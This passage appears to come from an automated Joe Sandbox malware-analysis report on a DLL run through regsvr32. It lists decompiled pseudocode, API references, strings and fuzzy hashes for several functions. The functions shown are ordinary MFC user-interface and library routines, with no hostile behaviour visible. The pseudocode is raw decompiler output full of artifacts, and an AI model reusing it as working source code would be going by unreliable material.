					 *0x6da858a0 = GetProcAddress(_t18, "ReleaseActCtx");
					 *0x6da858a4 = GetProcAddress(_t18, "ActivateActCtx");
					_t10 = GetProcAddress(_t18, "DeactivateActCtx");
					_pop(_t18);
					 *0x6da858a8 = _t10;
					_t24 =  *0x6da8589c; // 0x0
					if(_t24 == 0) {
						__eflags =  *0x6da858a0; // 0x0
						if(__eflags != 0) {
							goto L2;
						} else {
							__eflags =  *0x6da858a4; // 0x0
							if(__eflags != 0) {
								goto L2;
							} else {
								__eflags = _t10;
								if(_t10 != 0) {
									goto L2;
								}
							}
						}
					} else {
						_t25 =  *0x6da858a0; // 0x0
						if(_t25 == 0) {
							goto L2;
						} else {
							_t26 =  *0x6da858a4; // 0x0
							if(_t26 == 0) {
								goto L2;
							} else {
								if(_t10 == 0) {
									goto L2;
								}
							}
						}
					}
					_t5 = _v8;
					 *0x6da858ac = 1;
				}
				return _t5;
			}

0x6da45d28
0x6da45d29
0x6da45d2b
0x6da45d31
0x6da45d33
0x6da45d36
0x6da45d39
0x6da45d3f
0x6da45d52
0x6da45d56
0x6da45d58
0x6da45d58
0x6da45d58
0x6da45d71
0x6da45d7e
0x6da45d8b
0x6da45d90
0x6da45d92
0x6da45d93
0x6da45d99
0x6da45d9f
0x6da45db7
0x6da45dbd
0x00000000
0x6da45dbf
0x6da45dbf
0x6da45dc5
0x00000000
0x6da45dc7
0x6da45dc7
0x6da45dc9
0x00000000
0x00000000
0x6da45dc9
0x6da45dc5
0x6da45da1
0x6da45da1
0x6da45da7
0x00000000
0x6da45da9
0x6da45da9
0x6da45daf
0x00000000
0x6da45db1
0x6da45db3
0x00000000
0x6da45db5
0x6da45db3
0x6da45daf
0x6da45da7
0x6da45dcb
0x6da45dce
0x6da45dce
0x6da45dd7

APIs

GetModuleHandleA.KERNEL32(KERNEL32), ref: 6DA45D4C
GetProcAddress.KERNEL32(00000000,CreateActCtxA), ref: 6DA45D69
GetProcAddress.KERNEL32(00000000,ReleaseActCtx), ref: 6DA45D76
GetProcAddress.KERNEL32(00000000,ActivateActCtx), ref: 6DA45D83
GetProcAddress.KERNEL32(00000000,DeactivateActCtx), ref: 6DA45D90

Strings

KERNEL32, xrefs: 6DA45D47
ReleaseActCtx, xrefs: 6DA45D6B
ActivateActCtx, xrefs: 6DA45D78
DeactivateActCtx, xrefs: 6DA45D85
CreateActCtxA, xrefs: 6DA45D63

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
API String ID: 667068680-3617302793
Opcode ID: 76729d1d6fe2f66153a5960d0cfff3aef30815336b5ab6b3d7f82de240d4e91a
Instruction ID: c3aa97e3e0a13f29d1a83d566f29c8136347165bf7b2348d14c4c8750e71f7a7
Opcode Fuzzy Hash: 76729d1d6fe2f66153a5960d0cfff3aef30815336b5ab6b3d7f82de240d4e91a
Instruction Fuzzy Hash: BF113D7A90C396AF8F21EF6A888893B7EF4AE47312798C53FE90597111D77084C1DE52

Uniqueness

Uniqueness Score: -1.00%

Function 6DA47D80 Relevance: 16.6, APIs: 11, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6DA47D80(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t54;
				void* _t58;
				signed int _t59;
				signed int _t63;
				signed int _t71;
				signed int _t84;
				struct HINSTANCE__* _t95;
				signed int _t96;
				void* _t97;
				signed int _t99;
				void* _t100;
				void* _t101;

				_t101 = __eflags;
				_push(0x24);
				E6DA5C840(E6DA6E55C, __ebx, __edi, __esi);
				_t99 = __ecx;
				 *((intOrPtr*)(_t100 - 0x20)) = __ecx;
				 *(_t100 - 0x1c) =  *(__ecx + 0x60);
				 *(_t100 - 0x18) =  *(__ecx + 0x5c);
				_t54 = E6DA4984E(__ebx, __edi, __ecx, _t101);
				_t95 =  *(_t54 + 0xc);
				_t84 = 0;
				_t102 =  *(_t99 + 0x58);
				if( *(_t99 + 0x58) != 0) {
					_t95 =  *(E6DA4984E(0, _t95, _t99, _t102) + 0xc);
					_t54 = LoadResource(_t95, FindResourceA(_t95,  *(_t99 + 0x58), 5));
					 *(_t100 - 0x18) = _t54;
				}
				if( *(_t100 - 0x18) != _t84) {
					_t54 = LockResource( *(_t100 - 0x18));
					 *(_t100 - 0x1c) = _t54;
				}
				if( *(_t100 - 0x1c) != _t84) {
					_t86 = _t99;
					 *(_t100 - 0x14) = E6DA478FA(_t84, _t99, __eflags);
					E6DA406AB(_t84, _t95, __eflags);
					 *(_t100 - 0x28) =  *(_t100 - 0x28) & _t84;
					 *(_t100 - 0x2c) = _t84;
					 *(_t100 - 0x24) = _t84;
					__eflags =  *(_t100 - 0x14) - _t84;
					if(__eflags != 0) {
						__eflags =  *(_t100 - 0x14) - GetDesktopWindow();
						if(__eflags != 0) {
							__eflags = IsWindowEnabled( *(_t100 - 0x14));
							if(__eflags != 0) {
								EnableWindow( *(_t100 - 0x14), 0);
								 *(_t100 - 0x2c) = 1;
								_t84 = E6DA3F1B8();
								 *(_t100 - 0x24) = _t84;
								__eflags = _t84;
								if(__eflags != 0) {
									_t86 = _t84;
									__eflags =  *((intOrPtr*)( *_t84 + 0x128))();
									if(__eflags != 0) {
										_t86 = _t84;
										__eflags = E6DA436A2(_t84);
										if(__eflags != 0) {
											_t86 = _t84;
											E6DA436BD(_t84, 0);
											 *(_t100 - 0x28) = 1;
										}
									}
								}
							}
						}
					}
					 *(_t100 - 4) =  *(_t100 - 4) & 0x00000000;
					E6DA421CF(_t84, __eflags, _t99);
					_t58 = E6DA405F2(_t84, _t86,  *(_t100 - 0x14));
					_push(_t95);
					_push(_t58);
					_push( *(_t100 - 0x1c));
					_t59 = E6DA47BCA(_t84, _t99, _t95, _t99, __eflags);
					_t96 = 0;
					__eflags = _t59;
					if(_t59 != 0) {
						__eflags =  *(_t99 + 0x3c) & 0x00000010;
						if(( *(_t99 + 0x3c) & 0x00000010) != 0) {
							_t97 = 4;
							_t71 = E6DA43579(_t99);
							__eflags = _t71 & 0x00000100;
							if((_t71 & 0x00000100) != 0) {
								_t97 = 5;
							}
							E6DA4017B(_t99, _t97);
							_t96 = 0;
							__eflags = 0;
						}
						__eflags =  *((intOrPtr*)(_t99 + 0x20)) - _t96;
						if( *((intOrPtr*)(_t99 + 0x20)) != _t96) {
							E6DA4390A(_t99, _t96, _t96, _t96, _t96, _t96, 0x97);
						}
					}
					 *(_t100 - 4) =  *(_t100 - 4) | 0xffffffff;
					__eflags =  *(_t100 - 0x28) - _t96;
					if( *(_t100 - 0x28) != _t96) {
						E6DA436BD(_t84, 1);
					}
					__eflags =  *(_t100 - 0x2c) - _t96;
					if( *(_t100 - 0x2c) != _t96) {
						EnableWindow( *(_t100 - 0x14), 1);
					}
					__eflags =  *(_t100 - 0x14) - _t96;
					if(__eflags != 0) {
						__eflags = GetActiveWindow() -  *((intOrPtr*)(_t99 + 0x20));
						if(__eflags == 0) {
							SetActiveWindow( *(_t100 - 0x14));
						}
					}
					 *((intOrPtr*)( *_t99 + 0x60))();
					E6DA47936(_t84, _t99, _t96, _t99, __eflags);
					__eflags =  *(_t99 + 0x58) - _t96;
					if( *(_t99 + 0x58) != _t96) {
						FreeResource( *(_t100 - 0x18));
					}
					_t63 =  *(_t99 + 0x44);
					goto L31;
				} else {
					_t63 = _t54 | 0xffffffff;
					L31:
					return E6DA5C8E5(_t63);
				}
			}

0x6da47d80
0x6da47d80
0x6da47d87
0x6da47d8c
0x6da47d8e
0x6da47d94
0x6da47d9a
0x6da47d9d
0x6da47da2
0x6da47da5
0x6da47da7
0x6da47daa
0x6da47db1
0x6da47dc2
0x6da47dc8
0x6da47dc8
0x6da47dce
0x6da47dd3
0x6da47dd9
0x6da47dd9
0x6da47ddf
0x6da47de9
0x6da47df0
0x6da47df3
0x6da47df8
0x6da47dfb
0x6da47dfe
0x6da47e01
0x6da47e04
0x6da47e0c
0x6da47e0f
0x6da47e1a
0x6da47e1c
0x6da47e23
0x6da47e29
0x6da47e35
0x6da47e37
0x6da47e3a
0x6da47e3c
0x6da47e40
0x6da47e48
0x6da47e4a
0x6da47e4c
0x6da47e53
0x6da47e55
0x6da47e59
0x6da47e5b
0x6da47e60
0x6da47e60
0x6da47e55
0x6da47e4a
0x6da47e3c
0x6da47e1c
0x6da47e0f
0x6da47e67
0x6da47e6c
0x6da47e74
0x6da47e79
0x6da47e7a
0x6da47e7b
0x6da47e80
0x6da47e85
0x6da47e87
0x6da47e89
0x6da47e8b
0x6da47e8f
0x6da47e93
0x6da47e96
0x6da47e9b
0x6da47ea0
0x6da47ea4
0x6da47ea4
0x6da47ea8
0x6da47ead
0x6da47ead
0x6da47ead
0x6da47eaf
0x6da47eb2
0x6da47ec0
0x6da47ec0
0x6da47eb2
0x6da47ec5
0x6da47ef0
0x6da47ef3
0x6da47ef9
0x6da47ef9
0x6da47efe
0x6da47f01
0x6da47f08
0x6da47f08
0x6da47f0e
0x6da47f11
0x6da47f19
0x6da47f1c
0x6da47f21
0x6da47f21
0x6da47f1c
0x6da47f2b
0x6da47f30
0x6da47f35
0x6da47f38
0x6da47f3d
0x6da47f3d
0x6da47f43
0x00000000
0x6da47de1
0x6da47de1
0x6da47f46
0x6da47f4b
0x6da47f4b

APIs

__EH_prolog3_catch.LIBCMT ref: 6DA47D87
FindResourceA.KERNEL32 ref: 6DA47DBA
LoadResource.KERNEL32(?,00000000), ref: 6DA47DC2

Part of subcall function 6DA406AB: UnhookWindowsHookEx.USER32 ref: 6DA406DB

LockResource.KERNEL32(?,00000024,6DA25FA4,00000000,616B45BB), ref: 6DA47DD3
GetDesktopWindow.USER32 ref: 6DA47E06
IsWindowEnabled.USER32(?), ref: 6DA47E14
EnableWindow.USER32(?,00000000), ref: 6DA47E23

Part of subcall function 6DA436A2: IsWindowEnabled.USER32(?), ref: 6DA436AB

Part of subcall function 6DA436BD: EnableWindow.USER32(?,6DA25FA4), ref: 6DA436CE

EnableWindow.USER32(?,00000001), ref: 6DA47F08
GetActiveWindow.USER32 ref: 6DA47F13
SetActiveWindow.USER32(?), ref: 6DA47F21
FreeResource.KERNEL32(?,?,00000024,6DA25FA4,00000000,616B45BB), ref: 6DA47F3D

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window$Resource$Enable$ActiveEnabled$DesktopFindFreeH_prolog3_catchHookLoadLockUnhookWindows
String ID:
API String ID: 964565984-0
Opcode ID: 8f2a84c4bac925b85f0e4d8e6c2cc0776c308456adc22c89571e0edd98363484
Instruction ID: 584b46553c91c81a7722cc8dce6112c3120f034be4aac5606be69918ff7d8366
Opcode Fuzzy Hash: 8f2a84c4bac925b85f0e4d8e6c2cc0776c308456adc22c89571e0edd98363484
Instruction Fuzzy Hash: EF51C038E0C746CFDF119FB5CA88BBEBBB1AF45715F108129E211A2290DB758981CF95

Uniqueness

Uniqueness Score: -1.00%

Function 6DA41E2F Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E6DA41E2F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t31;
				void* _t33;
				void* _t34;
				void* _t40;
				void* _t43;
				void* _t61;
				void* _t65;
				struct HWND__* _t67;
				CHAR* _t69;
				void* _t72;

				_t65 = __edx;
				_t61 = __ecx;
				_push(0x40);
				E6DA5C840(E6DA6E16A, __ebx, __edi, __esi);
				_t67 =  *(_t72 + 8);
				_t69 = "AfxOldWndProc423";
				_t31 = GetPropA(_t67, _t69);
				 *(_t72 - 0x14) =  *(_t72 - 0x14) & 0x00000000;
				 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
				 *(_t72 - 0x18) = _t31;
				_t59 = 1;
				_t33 =  *(_t72 + 0xc) - 6;
				if(_t33 == 0) {
					_t34 = E6DA405F2(1, _t61,  *(_t72 + 0x14));
					E6DA41D3F(_t61, E6DA405F2(1, _t61, _t67),  *(_t72 + 0x10), _t34);
					goto L9;
				} else {
					_t40 = _t33 - 0x1a;
					if(_t40 == 0) {
						_t59 = 0 | E6DA41DB7(1, _t67, E6DA405F2(1, _t61, _t67),  *(_t72 + 0x14),  *(_t72 + 0x14) >> 0x10) == 0x00000000;
						L9:
						if(_t59 != 0) {
							goto L10;
						}
					} else {
						_t43 = _t40 - 0x62;
						if(_t43 == 0) {
							SetWindowLongA(_t67, 0xfffffffc,  *(_t72 - 0x18));
							RemovePropA(_t67, _t69);
							GlobalDeleteAtom(GlobalFindAtomA(_t69) & 0x0000ffff);
							goto L10;
						} else {
							if(_t43 != 0x8e) {
								L10:
								 *(_t72 - 0x14) = CallWindowProcA( *(_t72 - 0x18), _t67,  *(_t72 + 0xc),  *(_t72 + 0x10),  *(_t72 + 0x14));
							} else {
								E6DA3F2EF(E6DA405F2(1, _t61, _t67), _t72 - 0x30, _t72 - 0x20);
								 *(_t72 - 0x14) = CallWindowProcA( *(_t72 - 0x18), _t67, 0x110,  *(_t72 + 0x10),  *(_t72 + 0x14));
								E6DA40C1B(1, _t65, _t50, _t72 - 0x30,  *((intOrPtr*)(_t72 - 0x20)));
							}
						}
					}
				}
				return E6DA5C8E5( *(_t72 - 0x14));
			}

0x6da41e2f
0x6da41e2f
0x6da41e2f
0x6da41e36
0x6da41e3b
0x6da41e3e
0x6da41e45
0x6da41e4b
0x6da41e4f
0x6da41e53
0x6da41e5b
0x6da41e5c
0x6da41e5f
0x6da41f0b
0x6da41f1d
0x00000000
0x6da41e65
0x6da41e65
0x6da41e68
0x6da41f03
0x6da41f22
0x6da41f24
0x00000000
0x00000000
0x6da41e6a
0x6da41e6a
0x6da41e6d
0x6da41ec6
0x6da41ece
0x6da41edf
0x00000000
0x6da41e6f
0x6da41e74
0x6da41f26
0x6da41f39
0x6da41e7a
0x6da41e8b
0x6da41ea8
0x6da41eb0
0x6da41eb0
0x6da41e74
0x6da41e6d
0x6da41e68
0x6da41ebd

APIs

__EH_prolog3_catch.LIBCMT ref: 6DA41E36
GetPropA.USER32(?,AfxOldWndProc423), ref: 6DA41E45
CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 6DA41E9F

Part of subcall function 6DA40C1B: GetWindowRect.USER32 ref: 6DA40C45

SetWindowLongA.USER32 ref: 6DA41EC6
RemovePropA.USER32(?,AfxOldWndProc423), ref: 6DA41ECE
GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 6DA41ED5
GlobalDeleteAtom.KERNEL32(?), ref: 6DA41EDF
CallWindowProcA.USER32(?,?,?,?,00000000), ref: 6DA41F33

Strings

AfxOldWndProc423, xrefs: 6DA41E3E, 6DA41E43, 6DA41ECC, 6DA41ED4

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcProp$DeleteFindH_prolog3_catchLongRectRemove
String ID: AfxOldWndProc423
API String ID: 2109165785-1060338832
Opcode ID: b19462c4215437cbde735b716a942c8c22632d60153e45a648b62638d7ec5bea
Instruction ID: 8c19d60a120ac212d1a3d01b40cb6e775dd737ffa6634e270f6ba4596f1e499d
Opcode Fuzzy Hash: b19462c4215437cbde735b716a942c8c22632d60153e45a648b62638d7ec5bea
Instruction Fuzzy Hash: FA314F7680D22AABCF019FA5CE49EBF3B78FF06311F058119F601A6050D73989A19B65

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4D436 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E6DA4D436(intOrPtr __ecx, signed int _a4) {
				signed int _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t12;
				void* _t14;
				char* _t23;
				void* _t29;
				signed short _t30;
				struct HDC__* _t31;
				signed int _t32;

				_t12 =  *0x6da82744; // 0x616b45bb
				_v8 = _t12 ^ _t32;
				_t31 = GetStockObject;
				_t30 = 0xa;
				_v72 = __ecx;
				_t23 = "System";
				_t14 = GetStockObject(0x11);
				if(_t14 != 0) {
					L2:
					if(GetObjectA(_t14, 0x3c,  &_v68) != 0) {
						_t23 =  &_v40;
						_t31 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t30 = MulDiv(_v68, 0x48, GetDeviceCaps(_t31, 0x5a)) & 0x0000ffff;
						ReleaseDC(0, _t31);
					}
					L6:
					_t16 = _a4;
					if(_a4 == 0) {
						_t16 = _t30 & 0x0000ffff;
					}
					return E6DA59DE2(E6DA4D2E2(_t23, _v72, _t29, _t31, _t23, _t16), _t23, _v8 ^ _t32, _t29, _t30, _t31);
				}
				_t14 = GetStockObject(0xd);
				if(_t14 == 0) {
					goto L6;
				}
				goto L2;
			}

0x6da4d43e
0x6da4d445
0x6da4d44a
0x6da4d453
0x6da4d456
0x6da4d459
0x6da4d45e
0x6da4d462
0x6da4d46c
0x6da4d47b
0x6da4d47f
0x6da4d48c
0x6da4d48e
0x6da4d490
0x6da4d490
0x6da4d4ab
0x6da4d4ae
0x6da4d4ae
0x6da4d4b4
0x6da4d4b4
0x6da4d4ba
0x6da4d4bc
0x6da4d4bc
0x6da4d4d7
0x6da4d4d7
0x6da4d466
0x6da4d46a
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 6DA4D45E
GetStockObject.GDI32(0000000D), ref: 6DA4D466
GetObjectA.GDI32(00000000,0000003C,?), ref: 6DA4D473
GetDC.USER32(00000000), ref: 6DA4D482
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6DA4D496
MulDiv.KERNEL32 ref: 6DA4D4A2
ReleaseDC.USER32(00000000,00000000), ref: 6DA4D4AE

Strings

System, xrefs: 6DA4D459, 6DA4D4C3

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: e3b7db72576ff31fd779e765417a2c306fe423c7b59d4024175cd3e6cfaf0549
Instruction ID: efafeb44e148f0419ed760e0ad4732057bc5bda05720b7c650901d2215ebe9ae
Opcode Fuzzy Hash: e3b7db72576ff31fd779e765417a2c306fe423c7b59d4024175cd3e6cfaf0549
Instruction Fuzzy Hash: 5411BF75608329EBEF109BA2CD49FAE7B78AF86741F008015FB05A7180DB759C42CB74

Uniqueness

Uniqueness Score: -1.00%

Function 6DA229A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 59
memorylibrarywindowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E6DA229A0(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v20;
				struct HINSTANCE__* _v24;
				struct HICON__* _v28;
				signed int _t19;
				char* _t21;
				signed int _t46;

				_push(0xffffffff);
				_push(E6DA6DCF8);
				_push( *[fs:0x0]);
				_t19 =  *0x6da82744; // 0x616b45bb
				_push(_t19 ^ _t46);
				_t21 =  &_v16;
				 *[fs:0x0] = _t21;
				if( *0x6da83c68 == 0) {
					E6DA212E0( &_v20);
					_v8 = 0;
					GetWindowsDirectoryA(E6DA215A0( &_v20, 0x104), 0x104);
					E6DA23050(__ebx,  &_v20, __edi, __esi, 0xffffffff);
					E6DA22F50( &_v20, "\\winhlp32.exe");
					_v24 = LoadLibraryA(E6DA23020( &_v20));
					if(_v24 != 0) {
						_v28 = LoadCursorA(_v24, 0x6a);
						if(_v28 != 0) {
							 *0x6da83c68 = CopyIcon(_v28);
						}
					}
					FreeLibrary(_v24);
					_v8 = 0xffffffff;
					_t21 = E6DA21320( &_v20);
				}
				 *[fs:0x0] = _v16;
				return _t21;
			}

0x6da229a3
0x6da229a5
0x6da229b0
0x6da229b4
0x6da229bb
0x6da229bc
0x6da229bf
0x6da229cc
0x6da229d5
0x6da229da
0x6da229f4
0x6da229ff
0x6da22a0c
0x6da22a20
0x6da22a27
0x6da22a35
0x6da22a3c
0x6da22a48
0x6da22a48
0x6da22a3c
0x6da22a51
0x6da22a57
0x6da22a61
0x6da22a61
0x6da22a69
0x6da22a74

APIs

GetWindowsDirectoryA.KERNEL32(00000000,00000104,00000104,616B45BB,6DA221C3,?), ref: 6DA229F4
_DebugHeapAllocator.LIBCPMTD ref: 6DA22A0C

Part of subcall function 6DA22F50: _DebugHeapAllocator.LIBCPMTD ref: 6DA22F5E

LoadLibraryA.KERNEL32(00000000), ref: 6DA22A1A
LoadCursorA.USER32 ref: 6DA22A2F
CopyIcon.USER32 ref: 6DA22A42
FreeLibrary.KERNEL32(00000000), ref: 6DA22A51

Strings

\winhlp32.exe, xrefs: 6DA22A04
h4t, xrefs: 6DA22A51

Memory Dump Source

Source File: 00000003.00000002.421377868.000000006DA21000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DA20000, based on PE: true

Associated: 00000003.00000002.421369853.000000006DA20000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421577728.000000006DA70000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421626383.000000006DA81000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421665735.000000006DA85000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.421690408.000000006DA88000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6da20000_regsvr32.jbxd

Similarity

API ID: AllocatorDebugHeapLibraryLoad$CopyCursorDirectoryFreeIconWindows
String ID: \winhlp32.exe$h4t
API String ID: 859693159-248396647
Opcode ID: 2d3c219b7e00b67b4d75c87b00b24d48e601dc60c5c01a90223d2cb19c6b29ec
Instruction ID: b675a2812c3a59cbbd95aaf4480c0d2daf55ec974b025b9be6e346ae7998100f
Opcode Fuzzy Hash: 2d3c219b7e00b67b4d75c87b00b24d48e601dc60c5c01a90223d2cb19c6b29ec
Instruction Fuzzy Hash: 4821907491C319EFCB10DFA6C988BBEB774FB06315F104629E621A32D0EB355A85CB54

Uniqueness

Uniqueness Score: -1.00%

Function 6DA4598F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E6DA4598F(void* __ecx, void* __edx, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				char _v268;
				struct HWND__* _v272;
				signed int _v276;
				long _v280;
				struct HWND__* _v284;
				intOrPtr _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t36;
				signed int _t53;
				intOrPtr _t56;
				long _t59;
				struct HWND__* _t62;
				CHAR* _t63;
				void* _t64;
				void* _t66;
				void* _t70;
				void* _t71;
				long _t72;
				void* _t73;
				void* _t74;
				signed int _t76;
				void* _t77;
				signed int _t81;

				_t70 = __edx;
				_t79 = _t81;
				_t36 =  *0x6da82744; // 0x616b45bb
				_v8 = _t36 ^ _t81;
				_t72 = _a4;
				_t76 = 0;
				_v288 = _a8;
				E6DA458A4(0);
				_t66 = _t71;
				_t62 = E6DA458DD(0,  &_v272);
				_v284 = _t62;
				if(_t62 != _v272) {
					EnableWindow(_t62, 1);
				}
				_v280 = _v280 & _t76;
				GetWindowThreadProcessId(_t62,  &_v280);
				if(_t62 == 0 || _v280 != GetCurrentProcessId()) {
					L7:
					__eflags = _t72;
					if(__eflags != 0) {
						_t12 = _t72 + 0x78; // 0x78
						_t76 = _t12;
					}
					goto L9;
				} else {
					_t59 = SendMessageA(_t62, 0x376, 0, 0);
					if(_t59 == 0) {
						goto L7;
					} else {
						_t76 = _t59;
						L9:
						_v276 = _v276 & 0x00000000;
						if(_t76 != 0) {
							_v276 =  *_t76;
							_t56 = _a16;
							if(_t56 != 0) {
								 *_t76 = _t56 + 0x30000;
							}
						}
						if((_a12 & 0x000000f0) == 0) {
							_t53 = _a12 & 0x0000000f;
							if(_t53 <= 1) {
								_t23 =  &_a12;
								 *_t23 = _a12 | 0x00000030;
								__eflags =  *_t23;
							} else {
								if(_t53 + 0xfffffffd <= 1) {
									_a12 = _a12 | 0x00000020;
								}
							}
						}
						_v268 = 0;
						_t96 = _t72;
						if(_t72 == 0) {
							_t63 =  &_v268;
							_t72 = 0x104;
							__eflags = GetModuleFileNameA(0, _t63, 0x104) - 0x104;
							if(__eflags == 0) {
								_v9 = 0;
							}
						} else {
							_t63 =  *(_t72 + 0x50);
						}
						_push(_a12);
						_push(_t63);
						_push(_v288);
						_push(_v284);
						_t73 = E6DA3F093(_t63, _t66, _t72, _t76, _t96);
						if(_t76 != 0) {
							 *_t76 = _v276;
						}
						if(_v272 != 0) {
							EnableWindow(_v272, 1);
						}
						E6DA458A4(1);
						_pop(_t74);
						_pop(_t77);
						_pop(_t64);
						return E6DA59DE2(_t73, _t64, _v8 ^ _t79, _t70, _t74, _t77);
					}
				}
			}

0x6da4598f
0x6da45992
0x6da4599a
0x6da459a1
0x6da459aa
0x6da459ad
0x6da459b0
0x6da459b6
0x6da459bb
0x6da459c9
0x6da459cb
0x6da459d7
0x6da459dc
0x6da459dc
0x6da459e2
0x6da459f0
0x6da459f8
0x6da45a20
0x6da45a20
0x6da45a22
0x6da45a24
0x6da45a24
0x6da45a24
0x00000000
0x6da45a08
0x6da45a12
0x6da45a1a
0x00000000
0x6da45a1c
0x6da45a1c
0x6da45a27
0x6da45a27
0x6da45a30
0x6da45a34
0x6da45a3a
0x6da45a3f
0x6da45a46
0x6da45a46
0x6da45a3f
0x6da45a4c
0x6da45a51
0x6da45a57
0x6da45a67
0x6da45a67
0x6da45a67
0x6da45a59
0x6da45a5f
0x6da45a61
0x6da45a61
0x6da45a5f
0x6da45a57
0x6da45a6b
0x6da45a72
0x6da45a74
0x6da45a7b
0x6da45a81
0x6da45a92
0x6da45a94
0x6da45a96
0x6da45a96
0x6da45a76
0x6da45a76
0x6da45a76
0x6da45a9a
0x6da45a9d
0x6da45a9e
0x6da45aa4
0x6da45ab2
0x6da45ab6
0x6da45abe
0x6da45abe
0x6da45ac7
0x6da45ad1
0x6da45ad1
0x6da45ad9
0x6da45ae4
0x6da45ae5
0x6da45ae8
0x6da45aef
0x6da45aef
0x6da45a1a

APIs

Part of subcall function 6DA458DD: GetParent.USER32(?), ref: 6DA45931
Part of subcall function 6DA458DD: GetLastActivePopup.USER32(?), ref: 6DA45942
Part of subcall function 6DA458DD: IsWindowEnabled.USER32(?), ref: 6DA45956
Part of subcall function 6DA458DD: EnableWindow.USER32(?,00000000), ref: 6DA45969

EnableWindow.USER32(?,00000001), ref: 6DA459DC
GetWindowThreadProcessId.USER32(?,?), ref: 6DA459F0
GetCurrentProcessId.KERNEL32 ref: 6DA459FA
SendMessageA.USER32 ref: 6DA45A12
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 6DA45A8C
EnableWindow.USER32(00000000,00000001), ref: 6DA45AD1

Strings

0, xrefs: 6DA45A67

Memory Dump Source

